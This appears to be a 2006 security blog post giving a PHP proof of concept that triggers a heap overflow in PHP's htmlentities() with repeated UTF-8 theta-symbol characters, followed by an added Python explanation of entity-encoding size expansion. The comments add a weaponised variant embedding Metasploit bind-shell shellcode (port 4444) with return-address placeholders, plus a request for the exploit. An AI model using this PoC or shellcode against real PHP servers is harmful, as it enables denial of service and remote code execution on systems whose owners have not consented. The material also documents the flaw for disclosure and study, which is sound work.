PoC / Exploit for PHP HTML Entity Encoder Heap Overflow Vulnerability - Crash/DoS?

07.11.2006


I like proof of concepts, so here is a simple PoC for the PHP HTML Entity Encoder Heap Overflow Vulnerability. The payload can be supplied in a request, so it can be triggered remotely.

Original Advisory : http://www.securityfocus.com/archive/1/450431

<?php

// PHP 5 <= 5.1.6, PHP 4 <= 4.4.4
$fuzzFixed = "";
echo "something... we need this stupid echo or do something else...";

// 64 copies of the two-byte UTF-8 sequence for code point 977
for ($pl = 0; $pl < 64; $pl++) {
    $fuzzFixed .= code2utf(977);
}

htmlentities($fuzzFixed, ENT_NOQUOTES, "utf-8");

// two-byte UTF-8 encoding of a code point in the range 128..2047
function code2utf($num) {
    return chr(($num >> 6) + 192) . chr(($num & 63) + 128);
}

echo "ehm...";
?>
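What makes code point 977 a good choice for this PoC is worth spelling out: it is a two-byte UTF-8 sequence that an HTML 4 entity encoder turns into the ten-byte entity &thetasym;, so the encoded output is five times the size of the input. An encoder that sizes its output buffer from the input length with too small a per-character allowance overflows on exactly this kind of input, which is why an entity encoder has to budget for the longest entity it can emit. The following Python is an added example written for this post, not the post's own code: it reimplements the PoC's code2utf() helper, generalised from the two-byte case to the full one-to-four-byte UTF-8 range so it can be checked against Python's built-in encoder, and it computes the input/output size ratio for a run of entity-encoded characters. The entity table is Python's html.entities, which is assumed here to match the HTML 4 names htmlentities() used for the utf-8 charset; entity_for() and expansion() are names of my own.

```python
"""
Added example (not from the original post): the PoC's code2utf() helper
generalised to the full UTF-8 range, plus a calculation of how much named
entity encoding expands the input. Standard library only.
"""
import html.entities


def code2utf(num: int) -> bytes:
    """UTF-8 encode a code point by hand.

    The PoC's PHP helper only handles the two-byte form (U+0080..U+07FF);
    this version covers one to four bytes so the bit arithmetic can be
    compared with Python's encoder for any non-surrogate code point.
    """
    if num < 0x80:                          # one byte: plain ASCII
        return bytes([num])
    if num < 0x800:                         # two bytes: same formula as the PoC
        return bytes([(num >> 6) + 0xC0, (num & 0x3F) + 0x80])
    if num < 0x10000:                       # three bytes
        return bytes([(num >> 12) + 0xE0,
                      ((num >> 6) & 0x3F) + 0x80,
                      (num & 0x3F) + 0x80])
    return bytes([(num >> 18) + 0xF0,       # four bytes
                  ((num >> 12) & 0x3F) + 0x80,
                  ((num >> 6) & 0x3F) + 0x80,
                  (num & 0x3F) + 0x80])


def entity_for(codepoint: int) -> str:
    """Return the HTML 4 named entity for a code point, or the character
    itself when no name exists (what an htmlentities()-style encoder emits).
    Assumption: html.entities.codepoint2name is the same table PHP used."""
    name = html.entities.codepoint2name.get(codepoint)
    return f"&{name};" if name else chr(codepoint)


def expansion(codepoints) -> tuple:
    """Return (input_bytes, output_bytes) for a sequence of code points
    encoded as UTF-8 and then rewritten with named entities."""
    raw = b"".join(code2utf(cp) for cp in codepoints)
    encoded = "".join(entity_for(cp) for cp in codepoints)
    return len(raw), len(encoded.encode("utf-8"))


if __name__ == "__main__":
    # The PoC's input: 64 copies of code point 977 (GREEK THETA SYMBOL).
    inp, out = expansion([977] * 64)
    print(f"code2utf(977) = {code2utf(977)!r}, entity = {entity_for(977)}")
    print(f"{inp} input bytes become {out} output bytes ({out // inp}x)")
```

Run it and the hand-rolled encoder agrees byte for byte with Python's for every code point tried; the 128-byte PoC input becomes 640 bytes of entities, which is the size mismatch a correctly sized output buffer has to accommodate.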

Comments


<?
$fuzzFixed="A";
#/* linux_ia32_bind - LPORT=4444 Size=108 Encoder=PexFnstenvSub http://metasploit.com */
$shellcode =
"\x2b\xc9\x83\xe9\xeb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x64"
"\xb4\xc7\x69\x83\xeb\xfc\xe2\xf4\x55\x6f\x94\x2a\x37\xde\xc5\x03"
"\x02\xec\x5e\xe0\x85\x79\x47\xff\x27\xe6\xa1\x01\x75\xe8\xa1\x3a"
"\xed\x55\xad\x0f\x3c\xe4\x96\x3f\xed\x55\x0a\xe9\xd4\xd2\x16\x8a"
"\xa9\x34\x95\x3b\x32\xf7\x4e\x88\xd4\xd2\x0a\xe9\xf7\xde\xc5\x30"
"\xd4\x8b\x0a\xe9\x2d\xcd\x3e\xd9\x6f\xe6\xaf\x46\x4b\xc7\xaf\x01"
"\x4b\xd6\xae\x07\xed\x57\x95\x3a\xed\x55\x0a\xe9";

echo "hmm";

for($pl=0; $pl<63; $pl++)
$fuzzFixed .= code2utf(977);
if($pl == "63") {
$fuzzFixed .= "BBBB"; #jump to ebp
$fuzzFixed .= "CCCC"; #ahh eip
$fuzzFixed .= "$shellcode";
}
htmlentities($fuzzFixed , ENT_NOQUOTES, "utf-8" );

function code2utf($num){
return chr(($num>>6)+192).chr(($num&63)+128);
}

echo "ehm...";
?>

Tontonq [ # | 01.12.2006 ]

May you send the EXP for PoC / Exploit for PHP HTML Entity Encoder Heap Overflow Vulnerability to me, please.
THX in advance. Lol

Tr4c3 [ # | 26.12.2006 ]




Ferruh Mavituna
© 2002-2007, Ferruh Mavituna
